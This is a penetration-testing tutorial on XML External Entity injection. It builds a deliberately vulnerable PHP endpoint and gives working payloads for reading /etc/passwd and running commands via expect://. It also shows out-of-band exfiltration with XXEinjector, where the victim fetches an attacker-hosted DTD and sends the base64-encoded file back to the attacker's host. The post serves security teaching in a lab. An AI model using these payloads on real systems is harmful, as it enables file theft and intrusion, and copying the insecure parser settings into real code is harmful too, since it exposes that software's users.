Exploitation: XML External Entity (XXE) Injection

During the course of our assessments, we sometimes come across a vulnerability that allows us to carry out XML eXternal Entity (XXE) Injection attacks. XXE Injection is a type of attack against an application that parses XML input. Although this is a relatively esoteric vulnerability compared to other web application attack vectors, like Cross-Site Request Forgery (CSRF), we make the most of it when it comes up, since it can lead to the extraction of sensitive data, and even Remote Code Execution (RCE) in some cases. We’ll go over setting up a basic, vulnerable PHP server and exploiting the vulnerability manually, then move on to a handy tool called XXEinjector to help automate the process.

We will also go through discovering the vulnerability with Burp. There are a couple of playgrounds we’ll be using. The first is a simple PHP server, while the other is a virtual machine running a vulnerable Django web application.

Setup

Before going into more detail regarding this attack, it may be helpful to understand how a web application interacts with an XML document in a manner that causes such an attack vector to arise. We’ve set up a virtual machine with a simple PHP server that utilizes an XML document to validate credentials.

This virtual machine, our first playground, is running Ubuntu 14.04.5 and PHP 5 on Apache. We used the following script to set up a PHP endpoint that parses XML input. For XML parsing to work, you will also need to install the php-xml module and restart the Apache server afterwards.

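<?php
    // Deliberately vulnerable: allow libxml to load external entities.
    libxml_disable_entity_loader(false);
    // Read the raw POST body.
    $xmlfile = file_get_contents('php://input');
    $dom = new DOMDocument();
    // LIBXML_NOENT substitutes entities; LIBXML_DTDLOAD loads external DTDs.
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);
    $creds = simplexml_import_dom($dom);
    $user = $creds->user;
    $pass = $creds->pass;
    // The expanded <user> value is echoed back to the client.
    echo "You have logged in as user $user";
?>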

The above script [3] is served when a request to /xml_injectable.php is made.

<creds>
    <user>Ed</user>
    <pass>mypass</pass>
</creds>

The four lines above are the expected input to the aforementioned PHP endpoint, and they are stored in a file called xml.txt. This file is sent as POST data via curl:

curl -d @xml.txt http://localhost/xml_injectable.php

The server responds with:

You have logged in as user Ed
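
The same request can also be built from a script. The following is a minimal Python sketch, assuming the endpoint URL from the curl command above; build_login_request is a hypothetical helper name, and the request is only constructed here, not sent.

```python
import urllib.request

# Sample credentials document, identical to xml.txt above.
CREDS_XML = """<creds>
    <user>Ed</user>
    <pass>mypass</pass>
</creds>"""


def build_login_request(url: str, xml_body: str) -> urllib.request.Request:
    """Build (but do not send) a POST request carrying the XML document."""
    return urllib.request.Request(
        url,
        data=xml_body.encode("utf-8"),
        # curl -d sends this content type by default. The PHP script reads
        # the raw body from php://input, so the XML still reaches the parser.
        headers={"Content-Type": "application/x-www-form-urlencoded"},
        method="POST",
    )


request = build_login_request("http://localhost/xml_injectable.php", CREDS_XML)
print(request.get_method(), request.full_url)
```

With the playground server running, passing the returned object to urllib.request.urlopen should produce the same response as the curl command.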

Proof of Concept

The most interesting aspect of parsing XML input files is that they can contain code that points to a file on the server itself. This is an example of an external entity. In a bit, we’ll go over the full scope of what external entities can be, including files hosted on the web via FTP and HTTP.

Let’s modify the xml.txt file to contain the following code:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

Notice the DOCTYPE declaration, which defines the external entity “xxe”, and the &xxe; reference in the “user” field. After sending the request with the above as POST data, the victim server will respond with its own /etc/passwd:

You have logged in as user root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

To reiterate, the XML input file that we provided (xml.txt) contains code to tell the server to look for the external entity, file:///etc/passwd, and then inject the contents into the “user” field. The last line of the PHP script then echoes back the goods.
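
The payload above follows a fixed pattern, so it can be generated for any target resource. Here is a minimal Python sketch, assuming the creds/user/pass layout of our playground; build_xxe_payload is a hypothetical helper and not part of any tool mentioned in this post.

```python
def build_xxe_payload(system_id: str, entity: str = "xxe") -> str:
    """Return an XML document whose <user> field expands an external entity.

    system_id is the resource the parser is asked to load, for example
    "file:///etc/passwd".
    """
    if '"' in system_id:
        # The system identifier is wrapped in double quotes below.
        raise ValueError("system_id must not contain a double quote")
    return (
        '<?xml version="1.0" encoding="ISO-8859-1"?>\n'
        "<!DOCTYPE foo [ <!ELEMENT foo ANY >\n"
        f'<!ENTITY {entity} SYSTEM "{system_id}" >]>\n'
        "<creds>\n"
        f"    <user>&{entity};</user>\n"
        "    <pass>mypass</pass>\n"
        "</creds>\n"
    )


print(build_xxe_payload("file:///etc/passwd"))
```

Writing the output to xml.txt and repeating the curl command reproduces the request shown above.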

Remote Code Execution

If fortune is on our side, and the PHP “expect” module is loaded, we can get RCE. Let’s modify the payload:

<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE foo [ <!ELEMENT foo ANY >
<!ENTITY xxe SYSTEM "expect://id" >]>
<creds>
    <user>&xxe;</user>
    <pass>mypass</pass>
</creds>

The response from the server will be something like:

You have logged in as user uid=0(root) gid=0(root) groups=0(root)

Instances where RCE is possible via XXE are rare, so let’s move on to a more common scenario: using a tool to help us automate the process of extracting data instead.

Automated XXE Injection using Burp and XXEinjector [2]

Let’s switch to our second playground [1] to help the reader follow along more easily. This is a TurnKey Linux virtual machine that is running a Django web application which is vulnerable to XXEi. In a real-world pentesting scenario, we’re most likely to use tools rather than manually exploiting a vulnerability, so let’s incorporate one of my favorite web application assessment tools as well: Burp.

I) Set up the VM

Simply extract and run the VM configuration file (.vmx). There is a readme file included in the download to help you set up a private network to your machine.

II) Set up Burp

Burp acts as a proxy between your machine and the target machine. It helps with inspecting, modifying, and scanning application-level requests and responses. The scanner that comes with Burp Pro is powerful when used mindfully.

III) Scan the vulnerable form

The VM server has a vulnerable form served at /static/mailingList.html. The form POSTs to /blog/newRegistration. Input some junk values and fire off a Burp scan. Scanning the form is not strictly required; we simply need a sample request for XXEinjector to use later on.

Burp should light up with the XXE vulnerability, along with some reflected XSS as a bonus. When we examine the XXE vulnerability, we get this advisory.

Figure 1: XXE Advisory


In fact, the professional version of Burp goes as far as using Burp Collaborator, an external service that helps with discovering vulnerabilities and exploiting targets. The Collaborator payloads that Burp sends to the vulnerable application are designed to make the target call out to Burp Collaborator via both DNS resolution and web requests. If the call succeeds, Collaborator informs your Burp instance that the target machine processed the malicious payload. Most vulnerabilities can be discovered by examining or timing the response, but sometimes an external service like Burp Collaborator can take things to the next level. In this case, Burp pulled the /etc/passwd file itself, but it also used Burp Collaborator to prove to us that the application reached out to an external server to pull a string.

Figure 2: /etc/passwd file

The following images showcase how Burp used Collaborator.

Figure 3: Request to Reach Out to Collaborator


Figure 4: Collaborator Responds with String


Figure 5: Application Uses String from Collaborator Response, Proving XXEi Is Possible


To get finer control over the XXE Injection process, let’s use XXEinjector. We will need the unmodified version of the request, which we’ll store in a file called request.txt.

Figure 6: Burp Request with Malicious Content


Figure 7: Unmodified Request


How Does XXEinjector Work?

XXEinjector operates a bit differently, in comparison to Burp (excluding Collaborator). Notice that in the manual injection method (Proof of Concept section) along with the Burp approach, we rely on the fact that the server is ultimately echoing out the injected entity somehow. This is a luxury that we may not always have in a vulnerable application. In order to exploit an application that does not echo back results, we’ll have to resort to the out-of-band techniques that XXEinjector utilizes. Burp Collaborator is similar to XXEinjector in that they both utilize out-of-band techniques.

This technique requires that the application can connect to the attacker’s site, which means egress filtering comes into play when attacking externally. XXEinjector can enumerate egress ports for us, which is a nice feature to help in getting the tool to work. It is important to note that XXEinjector can be a bit finicky, since the attack is more sophisticated than sending one request. We won’t be going through the egress-busting process here, since it’s simply a flag that you pass to XXEinjector (--enumports).

XXEinjector Methodology

1) Send a malicious request that tells the remote server to call back and request a payload file named file.dtd. In that same request, XXEinjector references two other entities that can only be resolved if file.dtd makes it to the victim web server and is interpreted correctly. This is a huge part of why XXEinjector is finicky. For example, for this to work on our PHP server, which we’ll reexamine in a bit, we need to supply a flag that tells XXEinjector to encode our payload in base64. Base64 uses a restricted character set, so characters such as quotes won’t trip up interpreters in the process of executing the exploit, and a WAF/IDS/IPS needs an extra decoding step in order to pick it up. This helps get the job done more robustly and quietly. The request looks something like this; the line of interest is the DOCTYPE declaration.

POST /xml_injectable.php HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length: 158
Host: 192.168.242.139
Content-Type: application/x-www-form-urlencoded

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://192.168.240.1:80/file.dtd">%remote;%int;%trick;]>
<creds>
    <user>blah</user>
    <pass>mypass</pass>
</creds>

There are three entities at play: “remote”, “int”, and “trick”. Only “remote” is defined in this request, and it points to a URL on our attacker machine, where XXEinjector is running. The moment XXEinjector fires off this request, it starts a server on port 80 (this can be changed) and waits to serve file.dtd.

2) The victim machine begins parsing the request, fetches file.dtd from our attacker machine, and replaces “%remote;” with its contents. file.dtd looks like the following (this is the whole file):

<!ENTITY % payl SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM
'http://192.168.240.1:80/?p=%payl;'>">

(That does not have to be on multiple lines; my attack strings were breaking the WYSIWYG editor.)

Note how we define a new entity, “payl”, which is a URL to the file we’re trying to pull out. We then define the two missing entities from the previous request, “int” and “trick”. Note that “trick” is an entity defined within the other entity, “int”. Lastly, notice that this payload is not encoded. Some characters are encoded, due to the embedding of one entity within another, but the request itself is not base64 encoded.

3) Great, now we have all of our entities defined, so here comes the awesome part of this attack. Notice how, in the “trick” entity definition, “%payl;” is replaced with the contents of /etc/passwd. That means all the victim server has to do is call back home to the server that XXEinjector is running, passing the contents of /etc/passwd as a parameter in that URL. The application does not need to echo the contents of /etc/passwd in its own response. It simply calls back home with the contents in that parameter. XXEinjector parses the parameter and saves it to a file. Done!
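
The two documents exchanged in the steps above can be sketched in Python. This is a minimal illustration and not XXEinjector’s actual code; build_trigger and build_dtd are hypothetical helper names, and the host, port, and target values are the ones from our lab.

```python
def build_trigger(host: str, port: int = 80) -> str:
    """DOCTYPE sent to the victim; only %remote; is defined at this point."""
    return (
        "<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "
        f'"http://{host}:{port}/file.dtd">'
        "%remote;%int;%trick;]>"
    )


def build_dtd(host: str, target: str, port: int = 80) -> str:
    """Contents of file.dtd, served by the attacker machine.

    The inner percent sign is written as &#37; because a literal "%" inside
    an entity value must start a parameter-entity reference.
    """
    return (
        f'<!ENTITY % payl SYSTEM "{target}">\n'
        "<!ENTITY % int \"<!ENTITY &#37; trick SYSTEM "
        f"'http://{host}:{port}/?p=%payl;'>\">\n"
    )


print(build_trigger("192.168.240.1"))
print(build_dtd("192.168.240.1", "file:///etc/passwd"))
```

Keeping the two builders separate mirrors the two-stage nature of the attack: the first string travels in our request, while the second is only handed out when the victim calls back.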

Practical Example

Alright, so the theory is great, but when we get down to using the tool, we might (we will) run into some issues. Let’s go back to our first playground, the simple PHP server running the xml_injectable.php script. We’ll be using this playground rather than the Django one because we have more control over what gets echoed out. The second playground was a good example of a fire-and-forget target: we pulled a VM from the web and ran Burp against it. Technically, we could modify the Django code, but modifying the small PHP script is easier. As a side note, Burp also picked up the same vulnerabilities in our smaller PHP environment.

Let’s modify the PHP script by commenting out irrelevant code and code that echoes things back.

<?php 
    libxml_disable_entity_loader (false); 
    $xmlfile = file_get_contents('php://input'); 
    $dom = new DOMDocument(); 
    $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD); 
    // $creds = simplexml_import_dom($dom); 
    // $user = $creds->user; 
    // $pass = $creds->pass; 
    // echo "You have logged in as user $user";
?>

So all that PHP script does now is parse the XML-formatted request body into a PHP object. Nothing is echoed back to the client.

Let’s fire off a sample XXEinjector request.

> sudo ruby XXEinjector.rb --host=192.168.240.1 --path=/etc/passwd --file=phprequest.txt --proxy=192.168.240.1:8080 --oob=http --verbose

Flags:

--host: This is our machine’s IP. XXEinjector needs to know this in order to craft the request for the victim machine to call back home and grab file.dtd.

--path: Loot location, i.e. the file on the victim machine that we want to retrieve.

--file: This contains the unmodified PHP request, with the exception of a marker, the string “XXEINJECT”, that shows where we want XXEinjector to start injecting. Anything under XXEINJECT is just what remains from our previous experiments and is relatively meaningless here. The contents of phprequest.txt follow:

POST /xml_injectable.php HTTP/1.1
Host: 192.168.242.139
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
XXEINJECT
<creds>
<user>blah</user>
<pass>mypass</pass>
</creds>

--proxy: This is not a mandatory flag. I’m simply proxying my requests through Burp to see what they look like. Alternatively, use the --verbose flag (which I’m using in this request) to see exactly what request XXEinjector is making and what the file.dtd it’s using looks like.

--oob: Out-of-band flag. This tells XXEinjector which protocol (HTTP here) to put in file.dtd for the victim machine to use when it inadvertently sends us the goods from /etc/passwd. This is one of those finicky flags that you have to experiment with, because it depends on the environment you’re trying to exploit. Sometimes certain protocols are not usable, or certain (most) egress ports are closed off. Experiment with --oob, --ftpport, --httpport, etc.
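
Conceptually, the XXEINJECT marker is just a placeholder that gets swapped for the malicious DOCTYPE. The Python sketch below illustrates that idea only; it is not how XXEinjector is implemented, inject is a hypothetical helper, and details a real tool has to handle (such as the Content-Length header) are ignored.

```python
MARKER = "XXEINJECT"


def inject(template: str, doctype: str) -> str:
    """Replace the first XXEINJECT marker in a raw request with the DOCTYPE."""
    if MARKER not in template:
        raise ValueError(f"template has no {MARKER} marker")
    return template.replace(MARKER, doctype, 1)


# Shortened stand-in for phprequest.txt, for illustration only.
template = (
    "POST /xml_injectable.php HTTP/1.1\n"
    "Host: 192.168.242.139\n"
    "\n"
    "XXEINJECT\n"
    "<creds>\n"
    "<user>blah</user>\n"
    "<pass>mypass</pass>\n"
    "</creds>\n"
)
doctype = (
    '<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://192.168.240.1:80/file.dtd">'
    "%remote;%int;%trick;]>"
)
print(inject(template, doctype))
```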

After firing off this request, we get the following output from XXEinjector, which is a sign of failure.

XXEinjector by Jakub Pałaczyński
DTD injected.
Enumeration locked.
Sending request with malicious XML:
http://192.168.242.139/xml_injectable.php 
{"User-Agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language"=>"en-US,en;q=0.5", "Accept-Encoding"=>"gzip, deflate", "Connection"=>"close", "Upgrade-Insecure-Requests"=>"1", "Content-Length"=>"158"}

<!DOCTYPE convert [ <!ENTITY % remote SYSTEM 
"http://192.168.240.1:80/file.dtd">%remote;%int;%trick;]>
<creds>
    <user>blah</user>
    <pass>mypass</pass>
</creds>

Got request for XML:
GET /file.dtd HTTP/1.0

Responding with XML for: /etc/passwd
XML payload sent:
<!ENTITY % payl SYSTEM "file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM
'http://192.168.240.1:80/?p=%payl;'>">


FTP/HTTP did not get response. XML parser cannot parse provided file or the application is not responsive. Wait or Next? W/n

Thanks to the verbose flag, we can see exactly what XXEinjector is doing. XXEinjector was successful in getting the victim server to call back for /file.dtd (the “Got request for XML” lines). However, near the end, the victim server did not send the goods back. What the hell?

Well, after examining our error log from Apache, we notice that our loadXML method wasn’t massaged satisfactorily in order to get it to spit out the goods.

[Sun Nov 06 09:10:46.145222 2016] [:error] [pid 1222] [client 192.168.242.1:64701] PHP Notice:  DOMDocument::loadXML(): PEReference: %int; not found in Entity, line: 1 in /var/www/html/xml_injectable.php on line 16
[Sun Nov 06 09:10:46.145257 2016] [:error] [pid 1222] [client 192.168.242.1:64701] PHP Notice:  DOMDocument::loadXML(): PEReference: %trick; not found in Entity, line: 1 in /var/www/html/xml_injectable.php on line 16

After some research into the semantics of XML and loadXML, I came to the realization that there was an encoding issue with how the resource file (/etc/passwd) is being specified. Fortunately, XXEinjector has a flag, specifically tailored to keep PHP happy, that reads the file through PHP’s php://filter wrapper and base64-encodes its contents. We simply add the --phpfilter flag to our request.

> sudo ruby XXEinjector.rb --host=192.168.240.1 --path=/etc/passwd --file=phprequest.txt --proxy=192.168.240.1:8080 --oob=http --verbose --phpfilter

Executing this command results in the following:

XXEinjector by Jakub Pałaczyński
DTD injected.
Enumeration locked.
Sending request with malicious XML:
http://192.168.242.139/xml_injectable.php 
{"User-Agent"=>"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0", "Accept"=>"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language"=>"en-US,en;q=0.5", "Accept-Encoding"=>"gzip, deflate", "Connection"=>"close", "Upgrade-Insecure-Requests"=>"1", "Content-Length"=>"158"}
<!DOCTYPE convert [ <!ENTITY % remote SYSTEM "http://192.168.240.1:80/file.dtd">%remote;%int;%trick;]>

<creds>
    <user>blah</user>
    <pass>mypass</pass>
</creds>
Got request for XML:
GET /file.dtd HTTP/1.0
Responding with XML for: /etc/passwd
XML payload sent:
<!ENTITY % payl SYSTEM "php://filter/read=convert.base64-encode/resource=file:///etc/passwd">
<!ENTITY % int "<!ENTITY &#37; trick SYSTEM
'http://192.168.240.1:80/?p=%payl;'>">
Response with file/directory content received:
GET /?p=cm9vdDp4OjA6M(rest of base64 encoded string) HTTP/1.0
Enumeration unlocked.
Successfully logged file: /etc/passwd
Nothing else to do. Exiting.

Upon checking, in our XXEinjector directory, Logs/<target_ip>/etc/passwd.log, we notice that our goods await.
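
If you ever need to recover the data by hand, for instance from a proxy log, the callback request line can be decoded with a few lines of Python. This is a minimal sketch, assuming the parameter is named p as in the output above; decode_callback is a hypothetical helper, not a function of XXEinjector.

```python
import base64
from urllib.parse import unquote, urlsplit


def decode_callback(request_line: str) -> str:
    """Extract and base64-decode the p parameter from a callback request line."""
    method, target, _version = request_line.split(" ", 2)
    if method != "GET":
        raise ValueError("expected a GET request line")
    for pair in urlsplit(target).query.split("&"):
        name, _, value = pair.partition("=")
        if name == "p":
            # unquote (not unquote_plus) keeps "+" intact, which is a
            # legitimate base64 character.
            encoded = unquote(value)
            break
    else:
        raise ValueError("no p parameter in request line")
    # Restore padding in case the trailing "=" characters were dropped.
    encoded += "=" * (-len(encoded) % 4)
    return base64.b64decode(encoded).decode("utf-8", errors="replace")


# "cm9vdDp4OjA6MA==" is the base64 encoding of "root:x:0:0".
print(decode_callback("GET /?p=cm9vdDp4OjA6MA== HTTP/1.0"))
```

The query string is split by hand rather than with parse_qs because parse_qs would turn any “+” in the base64 data into a space.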

Mission successful.